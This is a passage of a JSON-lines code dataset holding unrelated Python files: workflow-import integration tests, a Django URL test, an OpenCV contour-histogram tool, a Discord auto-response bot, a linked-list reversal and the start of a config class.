description\", \"ch1, ch2 , some checkbox 3\"),\n (\"task group code\", task_group.slug),\n (\"task start date\", date(2016, 7, 8)),\n (\"task due date\", date(2017, 12, 29)),\n (\"task assignees\", \"testuser@example.com\"),\n ]),\n ]\n response += self.import_data(*tgt_data_block)\n\n self._check_csv_response(response, {})\n self.assertEqual(1, Workflow.query.count())\n self.assertEqual(1, TaskGroup.query.count())\n self.assertEqual(3, TaskGroupTask.query.count())\n\n task_group = TaskGroup.query.filter_by(title=\"tg-1\").first()\n mapped_objs = [rel_obj for rel_obj in task_group.related_objects()\n if rel_obj.type == 'Objective']\n self.assertEqual(1, len(mapped_objs))\n\n task2 = TaskGroupTask.query.filter_by(title=\"task-2\").first()\n task3 = TaskGroupTask.query.filter_by(title=\"task-3\").first()\n self.assertEqual(task2.start_date, date(2015, 7, 10))\n self.assertEqual(task2.end_date, date(2016, 12, 30))\n self.assertIn(\"ch2\", task3.response_options)\n\n def test_invalid_import(self):\n \"\"\"Test import of a workflow with missing data\"\"\"\n bad_workflow = [\n collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", \"\"),\n (\"title\", \"bad_workflow-1\"),\n (\"admin\", \"\"),\n (\"Need Verification\", 'True'),\n ]),\n ]\n\n response = self.import_data(*bad_workflow)\n\n expected_errors = {\n \"Workflow\": {\n \"row_warnings\": {\n errors.OWNER_MISSING.format(line=3, column_name=\"Admin\")\n },\n }\n }\n self._check_csv_response(response, expected_errors)\n\n @ddt.data(\n (\"Rich Text\", \"Rich text example\", {}),\n (\"Checkboxes\", \"ch1, ch2, some checkbox 3\", {}),\n (\"aaaa\", \"Wrong task type\", {\n \"Task Group Task\": {\n \"row_warnings\": {\n errors.WRONG_REQUIRED_VALUE.format(\n line=3, value=\"aaaa\", column_name=\"Task Type\"\n ),\n }\n }\n }),\n (\"\", \"Empty task type\", {\n \"Task Group Task\": {\n \"row_warnings\": {\n errors.MISSING_VALUE_WARNING.format(\n line=3, default_value=\"Rich Text\",\n column_name=\"Task Type\"),\n }\n }\n })\n )\n @ddt.unpack\n def test_import_task_types(self, task_type, task_description,\n expected_errors):\n \"\"\"Test task import with warnings\n\n Check that the warnings for bad task type field work and that the task type\n gets set to default when an invalid values is found in the csv.\n\n Raises:\n AssertionError: When file import does not return correct errors for the\n example csv, or if any of the tasks does not have the expected task\n type.\n\n \"\"\"\n task_group = wf_factories.TaskGroupFactory(title=\"tg-1\")\n tgt_data_block = [\n collections.OrderedDict([\n (\"object_type\", \"Task Group Task\"),\n (\"code\", \"\"),\n (\"task title\", \"task-1\"),\n (\"task type\", task_type),\n (\"task description\", task_description),\n (\"task group code\", task_group.slug),\n (\"task start date\", date(2015, 7, 1)),\n (\"task due date\", date(2015, 7, 15)),\n (\"task assignees\", \"user@example.com\"),\n ]),\n ]\n\n response = self.import_data(*tgt_data_block)\n\n self._check_csv_response(response, expected_errors)\n\n task_type_aliases = {\n \"Rich Text\": \"text\",\n \"Checkboxes\": \"checkbox\"\n }\n\n if task_type not in task_type_aliases:\n task_type = \"Rich Text\"\n\n task_slug = db.session.query(TaskGroupTask.slug).filter(\n TaskGroupTask.task_type == task_type_aliases[task_type]).one()\n self.assert_task_types(task_type_aliases[task_type], task_slug)\n\n @ddt.data(\n (date(2099, 7, 1), date(2015, 7, 15), {\n \"Task Group Task\": {\n \"row_errors\": {\n errors.INVALID_START_END_DATES.format(\n line=3, 
start_date=\"Task Start Date\",\n end_date=\"Task Due Date\"),\n }\n }\n }),\n (date(2016, 12, 25), date(2017, 1, 12), {\n \"Task Group Task\": {\n \"row_errors\": {\n errors.START_DATE_ON_WEEKEND_ERROR.format(line=3),\n }\n }\n }),\n (date(2015, 7, 1), date(2016, 12, 25), {\n \"Task Group Task\": {\n \"row_errors\": {\n errors.END_DATE_ON_WEEKEND_ERROR.format(line=3),\n }\n }\n }),\n )\n @ddt.unpack\n def test_bad_task_dates(self, start_date, end_date, expected_errors):\n \"\"\"Test import updates with invalid task dates.\n\n This import checks if it's possible to update task dates\n 1. with start date being bigger than the end date.\n 2. Start date being a weekend\n 3. Due date being a weekend\n \"\"\"\n task_group = wf_factories.TaskGroupFactory(title=\"tg-1\")\n\n tgt_data_block = [\n collections.OrderedDict([\n (\"object_type\", \"Task Group Task\"),\n (\"code\", \"\"),\n (\"task title\", \"task-1\"),\n (\"task type\", \"Rich Text\"),\n (\"task group code\", task_group.slug),\n (\"task start date\", date(2015, 7, 1)),\n (\"task due date\", date(2015, 7, 15)),\n (\"task assignees\", \"user@example.com\"),\n ]),\n ]\n\n self.import_data(*tgt_data_block)\n\n task1 = TaskGroupTask.query.filter_by(title=\"task-1\").first()\n\n bad_tgt_data_block = [\n collections.OrderedDict([\n (\"object_type\", \"Task Group Task\"),\n (\"code\", task1.slug),\n (\"task start date\", start_date),\n (\"task due date\", end_date),\n ]),\n ]\n\n response = self.import_data(*bad_tgt_data_block)\n\n self._check_csv_response(response, expected_errors)\n\n def assert_task_types(self, expected_type, task_slugs):\n \"\"\"Test that all listed tasks have expected text type.\n\n This is a part of the test_import_task_date_format\n\n Args:\n expected_type: Expected task type for all tasks specified by task_slugs.\n task_slugs: list of slugs for the tasks that will be tested.\n\n Raises:\n AssertionError: if any of the tasks does not exists or if their type is\n not text.\n \"\"\"\n tasks = db.session.query(TaskGroupTask).filter(\n TaskGroupTask.slug.in_(task_slugs)).all()\n\n for task in tasks:\n self.assertEqual(\n task.task_type,\n expected_type,\n \"task '{}' has type '{}', expected '{}'\".format(\n task.slug,\n task.task_type,\n expected_type,\n )\n )\n self.assertEqual(len(tasks), len(task_slugs))\n\n @ddt.data(\n (True, 'True'),\n (True, 'true'),\n (True, 'TRUE'),\n (False, 'False'),\n (False, 'false'),\n (False, 'FALSE'),\n (True, 'yes'),\n (True, 'YES'),\n (True, 'Yes '),\n (True, 'yEs'),\n (False, ' no '),\n (False, 'No '),\n (False, 'nO'),\n (False, 'NO'),\n )\n @ddt.unpack\n def test_import_verification_flag(self, flag, import_value):\n \"\"\"Create wf with need verification flag.\"\"\"\n title = \"SomeTitle\"\n resp = self.import_data(collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", \"\"),\n (\"title\", title),\n (\"Need Verification\", import_value),\n (\"force real-time email updates\", \"no\"),\n (\"Admin\", \"user@example.com\"),\n ]))\n self.assertEqual(1, resp[0]['created'])\n workflow = Workflow.query.filter(Workflow.title == title).first()\n self.assertEqual(flag, workflow.is_verification_needed)\n\n @ddt.data(\n ('FALSE', False),\n ('False', False),\n ('false', False),\n ('TRUE', True),\n ('True', True),\n ('true', True),\n ('yes', True),\n ('YES', True),\n ('Yes ', True),\n ('yEs', True),\n (' no ', False),\n ('No ', False),\n ('nO', False),\n ('NO', False),\n )\n @ddt.unpack # pylint: disable=invalid-name\n def test_update_verification_true_flag_positive(self, 
import_value,\n expected_value):\n \"\"\"Test update of verification flag before activation\n when is_verification_needed is TRUE\n \"\"\"\n slug = 'SomeCode'\n with freezegun.freeze_time(\"2017-08-10\"):\n with factories.single_commit():\n workflow = wf_factories.WorkflowFactory(\n slug=slug, is_verification_needed=True)\n wf_factories.TaskGroupTaskFactory(\n task_group=wf_factories.TaskGroupFactory(\n workflow=workflow,\n context=factories.ContextFactory()\n ),\n start_date=date(2017, 8, 3),\n end_date=date(2017, 8, 7))\n wf_id = workflow.id\n resp = self.import_data(collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", slug),\n (\"title\", \"SomeTitle\"),\n (\"Need Verification\", import_value),\n (\"force real-time email updates\", \"no\"),\n (\"Admin\", \"user@example.com\"),\n ]))\n self.assertEqual(1, resp[0]['updated'])\n workflow = Workflow.query.filter(Workflow.id == wf_id).first()\n self.assertEqual(workflow.is_verification_needed, expected_value)\n\n @ddt.data(\n ('FALSE', False),\n ('False', False),\n ('false', False),\n ('TRUE', True),\n ('True', True),\n ('true', True),\n ('yes', True),\n ('YES', True),\n ('Yes ', True),\n ('yEs', True),\n (' no ', False),\n ('No ', False),\n ('nO', False),\n ('NO', False),\n )\n @ddt.unpack # pylint: disable=invalid-name\n def test_update_verification_false_flag_positive(self, import_value,\n expected_value):\n \"\"\"Test update of verification flag before activation\n when is_verification_needed is FALSE\n \"\"\"\n slug = 'SomeCode'\n with freezegun.freeze_time(\"2017-08-10\"):\n with factories.single_commit():\n workflow = wf_factories.WorkflowFactory(\n slug=slug, is_verification_needed=False)\n wf_factories.TaskGroupTaskFactory(\n task_group=wf_factories.TaskGroupFactory(\n workflow=workflow,\n context=factories.ContextFactory()\n ),\n start_date=date(2017, 8, 3),\n end_date=date(2017, 8, 7))\n wf_id = workflow.id\n resp = self.import_data(collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", slug),\n (\"title\", \"SomeTitle\"),\n (\"Need Verification\", import_value),\n (\"force real-time email updates\", \"no\"),\n (\"Admin\", \"user@example.com\"),\n ]))\n self.assertEqual(1, resp[0]['updated'])\n workflow = Workflow.query.filter(Workflow.id == wf_id).first()\n self.assertEqual(workflow.is_verification_needed, expected_value)\n\n @ddt.data(\n (True, 'FALSE'),\n (True, 'False'),\n (True, 'false'),\n (False, 'TRUE'),\n (False, 'True'),\n (False, 'true'),\n (False, 'yes'),\n (False, 'YES'),\n (False, 'Yes '),\n (False, 'yEs'),\n (True, ' no '),\n (True, 'No '),\n (True, 'nO'),\n (True, 'NO'),\n )\n @ddt.unpack # pylint: disable=invalid-name\n def test_update_verification_flag_negative(self, db_value, import_value):\n \"\"\"Test update of verification flag after activation\"\"\"\n slug = 'SomeCode'\n with freezegun.freeze_time(\"2017-08-10\"):\n with factories.single_commit():\n workflow = wf_factories.WorkflowFactory(\n slug=slug,\n is_verification_needed=db_value,\n repeat_every=1,\n unit=Workflow.WEEK_UNIT)\n wf_factories.TaskGroupTaskFactory(\n task_group=wf_factories.TaskGroupFactory(\n workflow=workflow,\n context=factories.ContextFactory()\n ),\n # Two cycles should be created\n start_date=date(2017, 8, 3),\n end_date=date(2017, 8, 7))\n\n wf_id = workflow.id\n self.generator.activate_workflow(workflow)\n workflow = Workflow.query.filter(Workflow.id == wf_id).first()\n self.assertEqual(workflow.status, workflow.ACTIVE)\n resp = self.import_data(collections.OrderedDict([\n (\"object_type\", 
\"Workflow\"),\n (\"code\", slug),\n (\"title\", \"SomeTitle\"),\n (\"Need Verification\", import_value),\n (\"force real-time email updates\", \"no\"),\n (\"Admin\", \"user@example.com\"),\n ]))\n self.assertEqual(1, resp[0]['ignored'])\n workflow = Workflow.query.filter(Workflow.id == wf_id).first()\n self.assertEqual(workflow.is_verification_needed, db_value)\n\n # End all current cycles\n for cycle in workflow.cycles:\n self.generator.modify_object(cycle, {'is_current': False})\n workflow = Workflow.query.filter(Workflow.id == wf_id).first()\n self.assertEqual(workflow.status, workflow.INACTIVE)\n resp = self.import_data(collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", slug),\n (\"title\", \"SomeTitle\"),\n (\"Need Verification\", import_value),\n (\"force real-time email updates\", \"no\"),\n (\"Admin\", \"user@example.com\"),\n ]))\n self.assertEqual(1, resp[0]['ignored'])\n workflow = Workflow.query.filter(Workflow.id == wf_id).first()\n self.assertEqual(workflow.is_verification_needed, db_value)\n\n def test_error_verification_flag(self):\n \"\"\"Test create wf without Needed Verification flag\"\"\"\n title = \"SomeTitle\"\n resp = self.import_data(collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", \"\"),\n (\"title\", title),\n (\"force real-time email updates\", \"no\"),\n (\"Admin\", \"user@example.com\"),\n ]))\n self.assertEqual(1, resp[0]['ignored'])\n self.assertIsNone(Workflow.query.filter(Workflow.title == title).first())\n\n @ddt.data((\"\", errors.MISSING_VALUE_ERROR), (\"--\", errors.WRONG_VALUE_ERROR))\n @ddt.unpack\n def test_create_required_flag_error(self, data, msg):\n \"\"\"Test create wf with empty or invalid Needed Verification flag\"\"\"\n title = \"SomeTitle\"\n resp = self.import_data(collections.OrderedDict([\n (\"object_type\", \"Workflow\"),\n (\"code\", \"\"),\n (\"title\", title),\n (\"force real-time email updates\", \"no\"),\n (\"Admin\", \"user@example.com\"),\n (\"Need Verification\", data),\n ]))\n data = {\n \"Workflow\": {\n \"row_errors\": {\n msg.format(line=3, column_name=\"Need Verification\")\n }\n }\n }\n self.assertEqual(1, resp[0]['ignored'])\n self._check_csv_response(resp, data)\n self.assertIsNone(Workflow.query.filter(Workflow.title == title).first())\n","sub_path":"test/integration/ggrc_workflows/converters/test_import_workflow_objects.py","file_name":"test_import_workflow_objects.py","file_ext":"py","file_size_in_byte":18554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"505645060","text":"from django.test import TestCase\nfrom django.test.client import Client\n\n\nclass TestURLS(TestCase):\n \"\"\"Test various urls.\"\"\"\n\n def setUp(self):\n \"\"\"Setup data.\"\"\"\n\n def tearDown(self):\n \"\"\"Clean up data.\"\"\"\n\n def test_urls(self):\n urls = [\n # url, expected http code\n ('/', 200),\n ('/login/', 302), # should redirect to CAS\n ('/login', 301), # should permanent redirect to /login/ (with /)\n ('/status/ping', 200),\n ('/status/ping/', 200),\n ('/status/health/', 200),\n ]\n client = Client()\n\n for url, code in urls:\n with self.subTest(url=url):\n response = client.get(url)\n location = getattr(response, 'url', '')\n msg = f'{url} -> {location} -> {response.content}'\n self.assertEquals(response.status_code, code, 
msg)\n","sub_path":"core/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"624979809","text":"import cv2\nimport numpy as np\nimport sys\nfrom matplotlib import pyplot as plt\nimport argparse\n\nimport pdb\n\n\ndrawing = False # true if mouse is pressed\n#ix = -1 #Creamos un punto inicial x,y\n#iy = -1,\ndotslist = [] #Creamos una lista donde almacenaremos los puntos del contorno\n\nglobal thick_contour\nthick_contour = 10\n\n# mouse callback function\ndef draw_dots(event1,x,y,flags,param): #Crea los puntos de contorno\n \n global ix,iy,drawing, dotslist#Hacemos globales la variabbles dentro de la funcion\n\n if event1 == cv2.EVENT_LBUTTONDOWN:#creamos la accion que se realizara si damos click\n drawing = True #Drawinf se vuelve True\n ix = x #Tomamos el punto donde se dio click\n iy = y\n dot = [x,y]\n dotslist.append(dot)#Lo agregamos al dotslist\n\n elif event1 == cv2.EVENT_MOUSEMOVE:#Creamos la accion si el mouse se mueve\n if drawing == True: #drawing se vuelve true\n #cv2.circle(img,(x,y),1,(0,0,255),2)\n cv2.line(img, (x,y), (x,y), (0,255,0), thick_contour)#Dibujamos una linea de un solo pixel\n x = x\n y = y\n dot = [x,y]\n dotslist.append(dot)#Agregamos el punto a dotslist\n #print(dotslist) #Imprimimos el dotslist\n\n elif event1 == cv2.EVENT_LBUTTONUP:#Cremaos el evento si el boton se levanta\n drawing = False\n #cv2.circle(img,(x,y),1,(0,0,255),1)\n cv2.line(img, (x,y), (x,y), (0,255,0), thick_contour)#Dibujamos la ultima lina en el ultimo punto\n \n return dotslist#Retornamos el dotlist\n\n\ndef Croped(dotslist, img):#hacemos un corte de la imagen en linea recta de tal forma que tenga las \n #dimenciones maximas del poligono que creamos\n rect = cv2.boundingRect(dotslist)#Encontramos los limites maximos del\n (x,y,w,h) = rect#Tomamos las dimenciones maximas del dotlist y las guardamos para dimencionar la mascara\n croped = img[y:y+h, x:x+w].copy()#cortamos una seccion rectangular de la imagen\n dotslist2 = dotslist- dotslist.min(axis=0)#reajustamos el dotslist con el minimo \n\n mask = np.zeros(croped.shape[:2], dtype = np.uint8)# creamos una mascara de ceros para poder hacer el corte irregular\n cv2.drawContours(mask, [dotslist2], -1, (255,255, 255), -1, cv2.LINE_AA)#dibujamos el contorno\n dts = cv2.bitwise_and(croped,croped, mask=mask)#hacemos ceros todos los pixeles externos al contorno, aplicamos la mascara a la imagen\n \n return [dts, mask, croped, dotslist2]\n\ndef save_img_with_contour(dotslist, img):\n mask = np.zeros(img.shape[:2], dtype = np.uint8)# creamos una mascara de ceros para poder hacer el corte irregular\n dotslist2 = dotslist- dotslist.min(axis=0)#reajustamos el dotslist con el minim\n cv2.drawContours(mask, [dotslist2], -1, (255,255, 255), -1, cv2.LINE_AA)#dibujamos el contorno\n \n return mask\n\ndef histogram(img, mask):\n \n hist = cv2.calcHist([img], [0], mask, [256], [0,256])\n return hist\n\ndef Listing(y):\n \n y1 = []#Creamos una lista vacia\n for i in range(len(y)):#llenamos la lista vacia con los datos de y, esto porque y es de la forma y = [[],[],[]], y necesitamos y = []\n y1.append(y[i][0]) \n \n return y1\n\ndef max_values(hist):\n \n hist = np.asarray(hist)\n max_count = max(hist)\n max_intensity = hist.argmax()\n return [max_count, max_intensity] \n\ndef img_in_memory(file):\n \n img = cv2.imread(file)#Lee la imagen a color\n return img\n\ndef File_Writer(file_name, data1):\n \n file = 
open(str(file_name) + '_Counts_vs_intensity.csv','a')\n \n file.write('# ' + str(file_name) + '_Counts_vs_intensity'+ '\\n')\n file.write('# counts max value: ' + str(data1[1]) + '\\n')\n file.write('# intensity max value: ' + str(data1[2]) + '\\n')\n file.write('# intensity counts \\n')\n \n for h in range(len(data1[0])):\n file.write(str(h) + '\t'+ str(data1[0][h]) +'\\n')\n file.close()\n \n\nap = argparse.ArgumentParser()\nap.add_argument('-i', '--image', help = 'path to the image')\nargs = vars(ap.parse_args())\n#llamamos asi #python Color_Detector_1.py --image 1.jpg\n\nfile = args['image']\n#file = str(sys.argv[1])\n\n#Rfactor= 0.20\n\nimg = cv2.imread(file)#Lee la imagen a color\nimg2 = cv2.imread(file,cv2.IMREAD_GRAYSCALE)#Lee la imagen pero en intensidad (B and W)\nimg3 = cv2.imread(file)\ncv2.namedWindow(file, cv2.WINDOW_NORMAL)#Cremaos la ventana para mistras a img\ncv2.setMouseCallback(file,draw_dots) #llamamos al MouseCall para dibujar el contorno\n\n\nname1 = file[0:-4]#definimos un mobre sin la extrension del archivo\n\n#Espacio_de_graficacion_1_de_histograma\nfig1 = plt.figure()\nax1 = fig1.add_subplot(111)\nplt.ion()\n\n#ax1.set_xlim(0,256)\nax1.set_xticks(np.linspace(0, 256, 10))#ajusta las etiquetas en x\nax1.set_xlabel('Intensity Values', fontsize= 12)\nax1.set_ylabel('Counts', fontsize= 12)\nax1.set_title('Histogram of: ' + name1)\n\n#Espacio_de_graficacion_2_de_histograma e imagen\nfig2 = plt.figure()\nplt.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=0.5, hspace=0.5)\nax2 = fig2.add_subplot(121)\n\nplt.ion()\nax2.set_xticks(np.linspace(0, 256, 10))#ajusta las etiquetas en x\nax2.set_xlabel('Intensity Values', fontsize= 12)\nax2.set_ylabel('Counts', fontsize= 12)\nax2.set_title('Image: ' + name1)\n\nax3 = fig2.add_subplot(122)\n\nax3.set_xlabel('x pixel position', fontsize= 12)\nax3.set_ylabel('y pixel position', fontsize= 12)\nax3.set_title('Histogram of: ' + name1)\n\nplt.ion()\n\nplt.show(block=False)\n\ni = 1\nwhile(1):\n cv2.imshow(file,img) #Mostramos a img en la ventana para dibujar el contono\n\n k = cv2.waitKey(10) & 0xFF\n #l = cv2.waitKey(1) & 0xFF\n \n \n if k == ord('a'): #space \n print('Corte_aplicado') \n dotslist = np.asarray(dotslist)#Convertimos el contorno en un array de numpy\n #Aplicamos el contorno a la image a partir de dtolist\n img_croped_BB = Croped(dotslist, img2)[0]#Rcuperamos solo la region de interes (imagen cortada con bordes negros=Black Borders)\n mask = Croped(dotslist, img2)[1] #Recuperamos la mascara creada\n img_croped = Croped(dotslist, img2)[2]#recuperamos la imagen cortada en rectangulo para analizar con la mascara \n \n dotslist = dotslist.tolist()\n #Sacamos el histograma\n hist = histogram(img_croped, mask)#Calculamos el histograma usando la mascara #len(hist) = 256\n hist = Listing(hist)\n [max_count, max_intensity] = max_values(hist)\n print('max count: ' + str(max_count) + '\\n' + 'max intensity: ' + str(max_intensity))\n\n \n if k == ord('s'):\n print('Datos guardados')\n #Analisis\n #x = np.linspace(0.0, len(hist), len(hist)) #creamos los x para hace el fit, (inicio, final, numero total)\n #pdb.set_trace()\n\n #Histograma\n #ax1.set_xticks(np.arange(0, len(x), step=20))\n line1, = ax1.plot(np.linspace(0, max(hist), 256, endpoint=False))\n line1.set_ydata(hist)\n ax1.set_xlabel('Intensity Values', fontsize= 12)\n ax1.set_ylabel('Counts', fontsize= 12)\n fig1.canvas.draw()#updatea el grafico con la nueva curva\n ax1.draw_artist(ax1.patch)#selecciona al arreglo de ax, para darle rango al eje x\n 
ax1.draw_artist(line1) #Redibuja line solo si es necesario\n ax1.text(120, 120, 'max count: ' + str(max_count) + '\\n' + 'max intensity: ' + str(max_intensity), fontsize=12)\n ax1.legend(loc='best')\n \n fig1.canvas.flush_events()#Hace un sleep para que se pueda crear la grafica\n fig1.savefig('Histogram of ' + name1 +'_' +str(i) + '.svg') \n \n #Imagen e histograma\n ax3.set_xlabel('x pixel position', fontsize= 12)\n ax3.set_ylabel('y pixel position', fontsize= 12)\n ax3.imshow(img_croped_BB, cmap= 'Greys')\n \n \n line2, = ax2.plot(np.linspace(0, max(hist), 256, endpoint=False))\n line2.set_ydata(hist)\n fig2.canvas.draw()#updatea el grafico con la nueva curva\n ax2.set_xlabel('Intensity Values', fontsize= 12)\n ax2.set_ylabel('Counts', fontsize= 12)\n ax2.draw_artist(ax2.patch)#selecciona al arreglo de ax, para darle rango al eje x\n ax2.draw_artist(line2) #Redibuja line solo si es necesario\n \n fig2.canvas.flush_events()#Hace un sleep para que se pueda crear la grafica\n fig2.savefig('Image_and_histogram_of_' + name1 + '_' +str(i) + '.svg')\n \n #plt.show()\n cv2.imshow('croped', img_croped_BB)#Mostramos img2 con el contorno \n cv2.imwrite(\"Corte_\" + name1 + '_' + str(i) +'_.jpg', img_croped_BB) \n \n File_Writer('Data_Analisis_Image:_'+ name1 + '_' + str(i), [hist, max_count, max_intensity])\n \n selected_area = cv2.drawContours(img, [np.asarray(dotslist)], -1, (0,255,0), thick_contour)#Dibujamos el contorno\n cv2.imwrite(\"Area_seleccionada_numero_\" + str(i) + \"de:\" + name1 +'_.jpeg', selected_area)\n \n i += 1#Para poder guardar en la siguiente ejecucion sin sobreescribir la anterior\n\n if k == ord('d'):\n print('Contorno y datos borrados')\n hist.clear()\n dotslist.clear()\n ax1.clear()\n ax2.clear()\n #cv2.destroyAllWindows()#Destruimos todas las ventanas\n cv2.namedWindow(file, cv2.WINDOW_NORMAL)\n img = img_in_memory(file)\n\n \n if k == ord('q'):#esc\n #pdb.set_trace()\n break# hace,el break para para el programa si se estripa esc\n\ncv2.destroyAllWindows()#Destruimos todas las ventanas\n","sub_path":"other_programs/MainContour_v6.py","file_name":"MainContour_v6.py","file_ext":"py","file_size_in_byte":9505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"142467571","text":"import discord\nfrom discord.ext import commands\nfrom discord.ext.commands import has_role\nfrom discord.utils import get\nimport os\nimport string\nimport re\nimport json\nfrom dotenv import load_dotenv\n\nbot = commands.Bot(command_prefix=\"~s \")\n\n\ndef writeJSON(trigger, response):\n newDict = ({trigger: response.content})\n with open('responses.json', encoding='utf8') as file:\n oldDict = json.load(file)\n\n final = dict(oldDict, **newDict)\n\n with open('responses.json', \"w\", encoding='utf8') as file:\n json.dump(final, file, indent=2)\n\n\ndef delJson(user, trigger):\n with open('responses.json', encoding='utf8') as file:\n dictionary = json.load(file)\n\n deletedEntry = dictionary.pop(trigger)\n delLog(user, deletedEntry)\n\n with open('responses.json', \"w\", encoding='utf8') as file:\n json.dump(dictionary, file, indent=2)\n\n\ndef writeLog(author, message, response):\n log = open(\"log.txt\", \"a\", encoding='utf8')\n entry = (\"User \" + str(author) + \" entered the trigger '\" + message + \"' with the response '\" + response + \"'\\n\")\n log.write(entry)\n print(entry)\n log.close()\n\n\ndef delLog(author, message):\n log = open(\"log.txt\", \"a\", encoding='utf8')\n entry = (\"User \" + str(author) + \" deleted the entry '\" + 
message + \"'\\n\")\n log.write(entry)\n print(entry)\n log.close()\n\n\ndef check(author):\n def check2(message):\n if message.author != author:\n return False\n return True\n\n return check2\n\n\n@bot.command(brief=\"Makes the bot user role.\",\n description=\"Makes the bot user role. You are free to change the color and permissions, \"\n \"but do not change the name.\")\nasync def setup(ctx):\n await ctx.message.delete()\n if get(ctx.guild.roles, name=\"Simply User\"):\n await ctx.author.send(\"Role is already setup.\")\n else:\n await ctx.guild.create_role(name=\"Simply User\", colour=discord.Colour.from_rgb(105, 135, 209))\n await ctx.author.send(\"Role created! 🎉\")\n\n\n@bot.command(brief=\"Adds new triggers and responses.\",\n description=\"Adds new triggers and responses. Note that it ignores punctuation only in the triggers.\")\n@has_role(\"Simply User\")\nasync def new(ctx):\n await ctx.message.delete()\n await ctx.author.send(\"What would you like the trigger message to be? `cancel` to cancel.\")\n unconditionedTrigger = await bot.wait_for('message', check=check(ctx.author))\n message = unconditionedTrigger.content\n\n if message == \"cancel\":\n await ctx.author.send(\"Cancelling.\")\n return\n\n for punc in string.punctuation:\n message = message.replace(punc, \"\")\n\n await ctx.author.send(\"Duly noted. What would you like the response to be? \")\n response = await bot.wait_for('message', check=check(ctx.author))\n await ctx.author.send(\"All done. 😀\")\n writeLog(unconditionedTrigger.author, message, response.content)\n writeJSON(message, response)\n\n\n@new.error\nasync def new_error(ctx, error):\n if isinstance(error, commands.MissingRole):\n await ctx.author.send(\"You do not have permissions to add an entry!\")\n if isinstance(error, commands.NoPrivateMessage):\n await ctx.author.send(\"You cannot run this command in PMs!\")\n\n\n@bot.command(brief=\"Deletes a selected trigger/response pair.\",\n description=\"Deletes a selected trigger/response pair. Note that it ignores punctuation in the target \"\n \"trigger.\")\nasync def delete(ctx):\n await ctx.message.delete()\n await ctx.author.send(\"What trigger would you like to delete? 🗑 (`cancel` to cancel.)\")\n unconTargetTrig = await bot.wait_for('message', check=check(ctx.author))\n targetTrig = unconTargetTrig.content\n\n if targetTrig == \"cancel\":\n await ctx.author.send(\"Cancelling.\")\n return\n\n for punc in string.punctuation:\n targetTrig = targetTrig.replace(punc, \"\")\n found = False\n with open('responses.json') as file:\n searchDict = json.load(file)\n for key in searchDict:\n if key.lower() == targetTrig.lower():\n await ctx.author.send(\"Sure thing.\")\n found = True\n delJson(ctx.author, key)\n if not found:\n await ctx.author.send(\"I can't find the entry you're looking for 🤔. 
Try again, or ask the host for help.\")\n\n\n@delete.error\nasync def delete_error(ctx, error):\n if isinstance(error, commands.MissingRole):\n await ctx.author.send(\"You do not have permissions to delete an entry!\")\n if isinstance(error, commands.NoPrivateMessage):\n await ctx.author.send(\"You cannot run this command in PMs!\")\n\n\n@bot.event\nasync def on_message(message):\n if message.author != bot.user and not isinstance(message.channel, discord.channel.DMChannel) and not message.author.bot:\n with open('responses.json') as file:\n searchDict = json.load(file)\n for key in searchDict:\n if re.search(r\"\\b\" + re.escape(key) + r\"(\\b|$)\", message.content,\n re.MULTILINE | re.IGNORECASE):\n await message.channel.send(searchDict[key])\n await bot.process_commands(message)\n\n\n@bot.event\nasync def on_ready():\n print(\"Bot Operational!\")\n\n\nload_dotenv()\ntoken = os.getenv('token')\nbot.run(token)\n\n# .,-:;//;:=,\n# . :H@@@MM@M#H/.,+%;,\n# ,/X+ +M@@M@MM%=,-%HMMM@X/,\n# -+@MM; $M@@MH+-,;XMMMM@MMMM@+-\n# ;@M@@M- XM@X;. -+XXXXXHHH@M@M#@/.\n# ,%MM@@MH ,@%= .---=-=:=,.\n# -@#@@@MX ., -%HX$$%%%+;\n# =-./@M@M$ .;@MMMM@MM:\n# X@/ -$MM/ .+MM@@@M$\n#,@M@H: :@: . -X#@@@@-\n#,@@@MMX, . /H- ;@M@M=\n#.H@@@@M@+, %MM+..%#$.\n# /MMMM@MMH/. XM@MH; -;\n# /%+%$XHH@$= , .H@@@@MX,\n# .=--------. -%H.,@@@@@MX,\n# .%MM@@@HHHXX$$$%+- .:$MMX -M@@MM%.\n# =XMMM@MM@MM#H;,-+HMM@M+ /MMMX=\n# =%@M@M#@$-.=$@MM@@@M; %M%=\n# ,:+$+-,/H#MMMMMMM@- -,\n# =++%%%%+/:-.\n#","sub_path":"simply-bot.py","file_name":"simply-bot.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"226112239","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param {ListNode} head\n # @param {integer} m\n # @param {integer} n\n # @return {ListNode}\n def reverseBetween(self, head, m, n):\n if m == n: return head\n index = 0\n dummy = ListNode(0)\n dummy.next = head\n begin= dummy\n for i in range(m-1):\n begin = begin.next # begin.next is the start\n p = begin.next\n for j in range(n-m):\n temp = begin.next\n begin.next = p.next\n p.next = p.next.next\n begin.next.next = temp\n return dummy.next\n","sub_path":"reverseLinkedList/reverseLinkedList.py","file_name":"reverseLinkedList.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120444801","text":"from json import load\nfrom json.decoder import JSONDecodeError\n\n\nclass Config:\n max_users = -1\n max_posts = -1\n max_likes = -1\n\n def __new__(cls, *args, **kwargs):\n if not hasattr(cls, '_instance'):\n cls._instance = super().__new__(cls, *args, **kwargs)\n return cls._instance\n\n def from_json(self, path: str):\n with open(path, 'r') as f:\n try:\n cfg = load(f)\n self._validate_cfg(cfg)\n self._init_from_cfg(cfg)\n except JSONDecodeError as e:\n raise e\n except ConfigValidationError as e:\n raise 